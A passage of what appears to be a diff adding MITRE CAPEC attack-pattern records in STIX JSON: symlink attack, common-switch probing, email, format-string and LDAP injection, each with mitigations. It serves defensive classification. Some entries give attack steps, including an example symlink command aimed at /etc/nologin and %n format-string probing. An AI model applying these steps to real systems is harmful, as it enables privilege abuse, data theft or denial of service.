the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack.\n Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must have a resource leak that the adversary can repeatedly trigger." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", + "id": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adc4413e-bddd-423e-ba63-df78f79cc02f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf45c4fb-cc58-4502-876c-56d851cd73f9", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", + "id": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", + "id": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-131-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dbe99895-80e2-48af-966a-55f26aadd3d5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e848e916-876c-4616-85ac-a44e4e90b63b", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.", + "external_references": [ + { + "external_id": "CAPEC-132", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "description": "Boot or Logon Autostart Execution:Shortcut Modification", + "external_id": "T1547.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/009" + }, + { + "description": "Shaun Colley, Crafting Symlinks for Fun and Profit", + "external_id": "REF-13", + "source_name": "reference_from_CAPEC", + "url": "http://www.infosecwriters.com/texts.php?op=display&id=159" + } + ], + "id": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Symlink Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The adversary creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n adversary# ln –s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the adversary happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Adversary identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.

    2. Techniques
    The adversary writes to files in different directories to check whether the application has sufficient checking before file operations.
    The adversary creates symlinks to files in different directories.

Experiment

  1. Try to create symlinks to different files: The adversary then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.

    2. Techniques
    The adversary monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the adversary can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
    The adversary may need a little guesswork on the filenames on which the target application would operate.
    The adversary tries to create symlinks to the various filenames.

Exploit

  1. Target application operates on created symlinks to sensitive files: The adversary is able to create symlinks to sensitive files while the target application is operating on the file.

    2. Techniques
    Create the symlink to the sensitive file such as configuration files, etc.
", + "x_capec_extended_description": "\n The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications.\n In some variants of this attack the adversary may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the adversary may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the adversary to control the actions of the target or to cause the target to expose information to the adversary. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the adversary would normally have.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The adversary must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link." + ], + "x_capec_skills_required": { + "High": "To identify the files and create the symlinks during the file operation time window", + "Low": "To create symlinks" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e73cf8-4cb5-4ae9-9a70-c2ebefdf62fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "spec_version": "2.1", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.", + "id": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cf8f1cf-51b6-4745-843d-2b4655e99ce6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a30baed8-dcc2-47af-93ca-38ef0fe2e8e2", + "spec_version": "2.1", + "target_ref": "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", + "external_references": [ + { + "external_id": "CAPEC-133", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/133.html" + }, + { + "external_id": "CWE-912", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/912.html" + } + ], + "id": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Try All Common Switches", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application: Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.

    2. Techniques
    Search via internet for known, published applications that allow option switches.
    Use automated tools to scan known ports to identify applications that might be accessible

  2. Authenticate to application: Authenticate to the application, if required, in order to explore it.

    3. Techniques
    Use published credentials to access system.
    Find unpublished credentails to access service.
    Use other attack pattern or weakness to bypass authentication.

Experiment

  1. Try all common switches: Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.

    2. Techniques
    Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.
    Use automated tools to run the application with common switches and observe the output

Exploit

  1. Use sensitive processing or configuration information: Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application

    2. Techniques
    Using application information, formulate an attack on the application
", + "x_capec_prerequisites": [ + "The attacker must be able to control the options or switches sent to the target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", + "id": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9849d6f7-11c6-49c0-a3b7-a87ba59d92c3", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--98da757a-6fb3-4a86-b0b3-c7731ca1325b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove all debug and testing options from production code.", + "id": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-133-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.", + "external_references": [ + { + "external_id": "CAPEC-134", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "Mail Command Injection", + "external_id": "30", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Mail-Command-Injection" + } + ], + "id": "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Email Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an adversary adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an adversary can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1" + ], + "x_capec_prerequisites": [ + "The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.", + "The adversary must have the ability to access the target mail application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", + "external_references": [ + { + "external_id": "CAPEC-135", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/135.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "description": "Format string attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Format_string_attack" + }, + { + "description": "Hal Burch, Brendan Saulsbury, FIO30-C. Exclude user input from format strings, 2011--05, CERT", + "external_id": "REF-14", + "source_name": "reference_from_CAPEC", + "url": "https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings" + }, + { + "description": "Robert Auger, WASC Threat Classification 2.0, The Web Application Security Consortium (WASC)", + "external_id": "REF-15", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-616", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html" + } + ], + "id": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Format String Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The adversary takes an inventory of the entry points of the application.

    2. Techniques
    Spider web sites for all available links
    List parameters, external variables, configuration files variables, etc. that are possibly used by the application.

Experiment

  1. Determine user-controllable input susceptible to format string injection: Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

    2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Exploit

  1. Try to exploit the Format String Injection vulnerability: After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.

    2. Techniques
    Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_prerequisites": [ + "The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the usage of formatting string functions.", + "id": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d7b9dd8b-8e73-4e2b-ba24-d8b7c5a033ec", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "spec_version": "2.1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dcb94cfe-e24f-4a9f-90fe-c4f2388067b2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "spec_version": "2.1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", + "external_references": [ + { + "external_id": "CAPEC-136", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/136.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-90", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "LDAP Injection", + "external_id": "29", + "source_name": "WASC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "LDAP Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/LDAP_Injection" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-17", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-608", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html" + } + ], + "id": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "modified": "2020-12-17T00:00:00.000Z", + "name": "LDAP Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker takes an inventory of the entry points of the application.

    2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to LDAP injection: For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
    Use modified client (modified by reverse engineering) to inject input.

  2. Try to exploit the LDAP injection vulnerability: After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.

    3. Techniques
    Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", + "id": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f1eb213-9854-4530-b7ae-cb3659bd69ac", + "modified": 